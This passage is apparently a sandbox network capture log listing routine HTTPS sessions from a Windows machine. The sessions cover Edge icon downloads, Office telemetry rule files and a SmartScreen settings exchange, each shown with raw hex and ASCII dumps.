2024-11-09 01:47:35 UTC	777	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Length: 2696 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [{"DcoPlusDebug":"Status: Ok"},{"RADIDS":"1,P425132595-T700343875-C128000000002116069+B+P60+S1"},{"BATCH_REDIRECT_STORE":"B128000000002116069+P0+S0"},{"OPTOUTSTATE":"256"},{"REGIONALPOLICY":"0"}] Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Allow-Credentials: true X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Sat, 09 Nov 2024 01:47:35 GMT Connection: close
2024-11-09 01:47:35 UTC	2696	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 4d 53 4e 41 6e 61 68 65 69 6d 4e 65 77 73 4e 54 50 49 6d 61 67 65 48 6f 74 73 70 6f 74 73 5c 22 2c 5c 22 75 5c 22 3a 5c 22 4d 53 4e 41 6e 61 68 65 69 6d 4e 65 77 73 4e 54 50 49 6d 61 67 65 73 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 74 69 74 6c 65 5c 22 3a 5c 22 4f 6b 61 76 61 6e 67 6f 20 52 69 76 65 72 2c 20 42 6f 74 73 77 61 6e 61 5c 22 2c 5c 22 63 74 61 5c 22 3a 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 5c 2f 73 65 61 72 63 68 3f 71 3d 4f 6b 61 76 61 6e Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"MSNAnaheimNewsNTPImageHotspots\",\"u\":\"MSNAnaheimNewsNTPImages\"}],\"ad\":{\"title\":\"Okavango River, Botswana\",\"cta\":\"https:\/\/www.bing.com\/search?q=Okavan

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.7	53049	13.107.246.57	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:35 UTC	425	OUT	GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-09 01:47:35 UTC	550	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:35 GMT Content-Type: image/png Content-Length: 1154 Connection: close Last-Modified: Wed, 25 Oct 2023 19:48:30 GMT ETag: 0x8DBD5935D5B3965 x-ms-request-id: d8cb9374-301e-0064-48c5-31d8a7000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241109T014735Z-17df447cdb5zfhrmhC1DFWh33000000006sg000000006118 Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 69316365 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-11-09 01:47:35 UTC	1154	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 04 17 49 44 41 54 78 01 ed 97 cf 6f db 64 18 c7 bf 76 6a ea 34 69 e3 26 4b d4 b4 30 d2 f1 ab 4c 9a 96 c1 6e ed a1 30 0e 5c 10 4c b0 d3 0e ed 05 c1 05 35 3d ec 00 97 66 ff 41 72 43 02 a9 1a bb 70 03 c4 0d 6d 62 48 4c e2 f7 3a 0a 62 17 56 6b ab d6 aa cd 1a 37 4d 66 c7 89 fd ee 7d 9d 25 6b 1b 27 b1 1b 57 bd e4 23 39 f1 ef 7e fa 3c ef f3 bc 6f 80 1e 3d 8e 16 ce e9 8d c2 87 3f 24 4d 42 7e 04 88 04 2f e1 20 13 82 ac f9 e5 db 19 bb cb 3c 1c 62 10 73 d1 73 39 06 41 82 03 b7 80 d9 6f 6c df ed 38 82 13 5f 6f 10 b8 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaIDATxodvj4i&K0Ln0\L5=fArCpmbHL:bVk7Mf}%k'W#9~<o=?$MB~/ <bss9Aol8_o

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.7	53050	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:35 UTC	192	OUT	GET /rules/rule700050v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:35 UTC	515	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:35 GMT Content-Type: text/xml Content-Length: 1352 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT ETag: "0x8DC582BE9DEEE28" x-ms-request-id: 0277188a-801e-0048-3238-32f3fb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014735Z-15869dbbcc6b2ncxhC1DFWu4ss000000013g000000008ekd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-09 01:47:35 UTC	1352	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T

Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.7	53052	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:35 UTC	192	OUT	GET /rules/rule702951v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:35 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:35 GMT Content-Type: text/xml Content-Length: 1405 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE12B5C71" x-ms-request-id: 6b887a68-501e-008f-7bca-2f9054000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014735Z-17df447cdb5jg4kthC1DFWux4n00000006pg00000000n3c3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:35 UTC	1405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.7	53051	13.107.246.45	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:35 UTC	192	OUT	GET /rules/rule700051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:35 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:35 GMT Content-Type: text/xml Content-Length: 1389 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE10A6BC1" x-ms-request-id: 0f87ae43-b01e-00ab-09a6-30dafd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014735Z-17df447cdb57srlrhC1DFWwgas00000006z000000000fa24 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:35 UTC	1389	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.7	53055	13.107.246.57	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:35 UTC	431	OUT	GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-09 01:47:35 UTC	536	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:35 GMT Content-Type: image/png Content-Length: 1468 Connection: close Last-Modified: Fri, 03 Nov 2023 21:43:14 GMT ETag: 0x8DBDCB5E23DFC43 x-ms-request-id: 72e8a890-701e-0068-5ba3-2c3656000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241109T014735Z-16547b76f7fnlcwwhC1DFWz6gw0000000ak000000000ddtn Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:35 UTC	1468	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 51 49 44 41 54 78 01 ed 97 4b 6c 54 55 18 c7 ff e7 4e 19 62 da e0 b0 a1 01 03 5c 82 51 7c 52 16 1a 6d 6b 42 57 c4 c7 c2 2e 8c 26 24 46 62 44 17 26 b4 04 62 5c a0 ad 1a 63 dc c8 82 85 89 26 b4 09 68 89 1a a7 18 79 24 1a c6 05 75 41 02 17 19 23 46 03 13 10 4a 35 c8 50 fa 9a b9 f7 9c cf ef 3c ee 74 a6 96 76 da a6 2b e6 4b 4f ef cc b9 e7 9e ef 77 ff df e3 de 01 6a 56 b3 9a d5 ec ce 36 81 45 b6 cd 67 28 85 89 89 14 22 f8 20 e9 4b 0f 29 41 22 25 3c ac 85 42 8a a4 f2 a9 a8 52 8d e1 c5 d4 d5 70 75 3e 49 de a6 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaQIDATxKlTUNb\Q\|RmkBW.&$FbD&b\c&hy$uA#FJ5P<tv+KOwjV6Eg(" K)A"%<BRpu>I

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.7	53057	13.91.96.185	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:35 UTC	698	OUT	POST /api/browser/edge/data/settings/3 HTTP/1.1 Host: data-edge.smartscreen.microsoft.com Connection: keep-alive Content-Length: 718 Accept: application/octet-stream;application/x-patch-bsdiff; Authorization: SmartScreenHash eyJhdXRoSWQiOiI0MWE0MzhiYy0xMjQ5LTQzZDMtYTI2ZC02OWNkNjJjMDgzMTciLCAia2V5IjoiMldGSWkyam5pNkxwQ3RjMXhUREpDUT09IiwgImhhc2giOiIwOGhRSjRIUzVZbz0ifQ== Content-Type: application/json; charset=utf-8 If-None-Match: "2.0-0" Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br
2024-11-09 01:47:35 UTC	718	OUT	Data Raw: 7b 22 69 64 65 6e 74 69 74 79 22 3a 7b 22 75 73 65 72 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 7d 2c 22 64 65 76 69 63 65 22 3a 7b 22 69 64 22 3a 6e 75 6c 6c 2c 22 63 75 73 74 6f 6d 49 64 22 3a 6e 75 6c 6c 2c 22 6f 6e 6c 69 6e 65 49 64 54 69 63 6b 65 74 22 3a 6e 75 6c 6c 2c 22 66 61 6d 69 6c 79 22 3a 33 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 2c 22 6f 73 56 65 72 73 69 6f 6e 22 3a 22 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 2e 76 62 5f 72 65 6c 65 61 73 65 22 2c 22 62 72 6f 77 73 65 72 22 3a 7b 22 69 6e 74 65 72 6e 65 74 5f 65 78 70 6c 6f 72 65 72 22 3a 22 39 2e 31 31 2e 31 39 30 34 31 2e 30 22 7d 2c 22 6e 65 74 4a 6f 69 6e 53 74 61 74 75 73 22 3a 32 2c 22 65 6e 74 65 72 70 72 69 73 65 22 3a 7b 7d 2c 22 63 6c 6f 75 64 53 6b Data Ascii: {"identity":{"user":{"locale":"en-GB"},"device":{"id":null,"customId":null,"onlineIdTicket":null,"family":3,"locale":"en-GB","osVersion":"10.0.19045.2006.vb_release","browser":{"internet_explorer":"9.11.19041.0"},"netJoinStatus":2,"enterprise":{},"cloudSk
2024-11-09 01:47:36 UTC	302	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:35 GMT Content-Type: application/octet-stream Content-Length: 130439 Connection: close Server: Kestrel ETag: "2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1" Request-Context: appId=cid-v1:3d5e3eff-de07-43c3-a15d-06b05ff513c8
2024-11-09 01:47:36 UTC	16082	IN	Data Raw: 7b 0d 0a 20 20 22 67 65 6f 69 64 4d 61 70 73 22 3a 20 7b 0d 0a 20 20 20 20 22 61 75 22 3a 20 22 68 74 74 70 73 3a 2f 2f 61 75 73 74 72 61 6c 69 61 2e 73 6d 61 72 74 73 63 72 65 65 6e 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 22 2c 0d 0a 20 20 20 20 22 63 68 22 3a 20 22 68 74 74 70 73 3a 2f 2f 73 77 69 74 7a 65 72 6c 61 6e 64 2e 73 6d 61 72 74 73 63 72 65 65 6e 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 22 2c 0d 0a 20 20 20 20 22 65 75 22 3a 20 22 68 74 74 70 73 3a 2f 2f 65 75 72 6f 70 65 2e 73 6d 61 72 74 73 63 72 65 65 6e 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 22 2c 0d 0a 20 20 20 20 22 66 66 6c 34 22 3a 20 22 68 74 74 70 73 3a 2f 2f 75 6e 69 74 65 64 73 74 61 74 65 73 31 2e 73 73 2e 77 64 2e 6d 69 63 72 6f 73 6f 66 74 2e 75 73 2f 22 2c 0d 0a Data Ascii: { "geoidMaps": { "au": "https://australia.smartscreen.microsoft.com/", "ch": "https://switzerland.smartscreen.microsoft.com/", "eu": "https://europe.smartscreen.microsoft.com/", "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",
2024-11-09 01:47:36 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 30 39 63 34 37 36 32 37 62 63 35 33 33 62 35 39 32 34 61 30 35 35 61 30 34 62 63 34 63 33 33 65 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 39 2e 35 38 33 34 34 30 31 37 37 34 34 37 38 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 65 36 33 34 65 62 32 30 64 62 35 30 38 65 33 61 33 31 62 36 31 34 38 31 61 32 35 31 62 66 39 33 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 30 2e 33 33 37 30 36 38 35 39 32 37 38 32 37 33 35 0d 0a 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: { "key": "09c47627bc533b5924a055a04bc4c33e", "value": 9.58344017744784 }, { "key": "e634eb20db508e3a31b61481a251bf93", "value": -0.337068592782735
2024-11-09 01:47:36 UTC	16384	IN	Data Raw: 30 37 37 37 34 37 33 33 30 39 35 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 31 32 62 62 65 66 63 30 35 64 35 31 34 32 65 37 65 62 36 38 36 66 61 64 38 64 65 61 39 32 31 31 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 30 35 37 31 37 37 35 33 31 31 38 30 39 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 63 65 35 66 62 38 64 66 31 32 35 61 34 37 32 31 64 31 64 66 33 32 38 62 63 36 66 32 64 64 65 61 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a Data Ascii: 07774733095 }, { "key": "12bbefc05d5142e7eb686fad8dea9211", "value": -1.05717753118094 }, { "key": "ce5fb8df125a4721d1df328bc6f2ddea", "value":
2024-11-09 01:47:36 UTC	16384	IN	Data Raw: 20 2d 31 2e 39 30 31 33 34 36 37 39 37 33 36 34 32 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 66 32 33 35 64 63 66 36 62 34 32 39 62 61 34 31 36 64 63 65 37 34 64 34 62 36 66 62 63 34 37 62 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 31 2e 32 36 30 31 38 31 31 38 35 36 30 38 38 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 63 38 66 31 37 64 37 34 30 33 61 63 35 66 66 32 38 39 36 61 37 31 33 61 37 31 37 35 65 64 31 39 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 Data Ascii: -1.9013467973642 }, { "key": "f235dcf6b429ba416dce74d4b6fbc47b", "value": 1.26018118560884 }, { "key": "c8f17d7403ac5ff2896a713a7175ed19", "va
2024-11-09 01:47:36 UTC	16384	IN	Data Raw: 36 62 64 32 65 65 33 36 63 30 33 66 36 66 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 35 2e 38 35 39 38 36 34 33 39 33 34 36 35 37 36 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 65 66 64 32 61 66 36 30 63 38 35 30 31 39 33 31 63 62 39 63 37 33 36 62 35 61 64 37 34 66 36 35 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 33 2e 39 35 36 39 39 35 33 35 33 36 34 30 30 33 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 32 63 38 34 38 35 34 38 64 34 36 30 63 Data Ascii: 6bd2ee36c03f6f", "value": 5.85986439346576 }, { "key": "efd2af60c8501931cb9c736b5ad74f65", "value": 3.95699535364003 }, { "key": "2c848548d460c
2024-11-09 01:47:36 UTC	16384	IN	Data Raw: 20 22 6b 65 79 22 3a 20 22 65 31 36 38 36 30 37 38 64 31 62 36 30 64 33 35 31 64 61 35 61 38 37 35 34 33 61 32 61 36 36 33 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 37 2e 35 30 36 36 35 35 32 34 32 36 32 35 35 31 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 33 61 33 34 31 37 66 35 66 32 30 61 30 33 61 39 38 39 37 33 36 38 39 38 38 37 66 62 37 32 61 32 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 37 34 39 32 32 35 31 37 36 34 32 37 39 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 Data Ascii: "key": "e1686078d1b60d351da5a87543a2a663", "value": 7.50665524262551 }, { "key": "3a3417f5f20a03a98973689887fb72a2", "value": -1.74922517642794 }, {
2024-11-09 01:47:36 UTC	16384	IN	Data Raw: 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 62 30 64 61 32 37 35 35 32 30 39 31 38 65 32 33 64 64 36 31 35 65 32 61 37 34 37 35 32 38 66 31 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 30 2e 39 37 36 31 34 30 37 39 32 39 31 35 33 37 33 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 63 66 61 62 31 62 61 38 63 36 37 63 37 63 38 33 38 64 62 39 38 64 36 36 36 66 30 32 61 31 33 32 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 31 31 37 38 37 35 38 36 30 34 35 30 39 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a Data Ascii: { "key": "b0da275520918e23dd615e2a747528f1", "value": -0.976140792915373 }, { "key": "cfab1ba8c67c7c838db98d666f02a132", "value": -1.11787586045094 },
2024-11-09 01:47:36 UTC	16053	IN	Data Raw: 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 64 65 39 35 62 34 33 62 63 65 65 62 34 62 39 39 38 61 65 64 34 61 65 64 35 63 65 66 31 61 65 37 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 30 33 33 31 39 35 35 36 37 30 31 31 37 37 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 61 64 64 65 63 34 32 36 39 33 32 65 37 31 33 32 33 37 30 30 61 66 61 31 39 31 31 66 38 66 31 63 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 30 2e 31 36 30 39 38 34 33 32 38 39 38 35 39 32 34 0d Data Ascii: }, { "key": "de95b43bceeb4b998aed4aed5cef1ae7", "value": -1.03319556701177 }, { "key": "addec426932e71323700afa1911f8f1c", "value": 0.160984328985924

Session ID	Source IP	Source Port	Destination IP	Destination Port
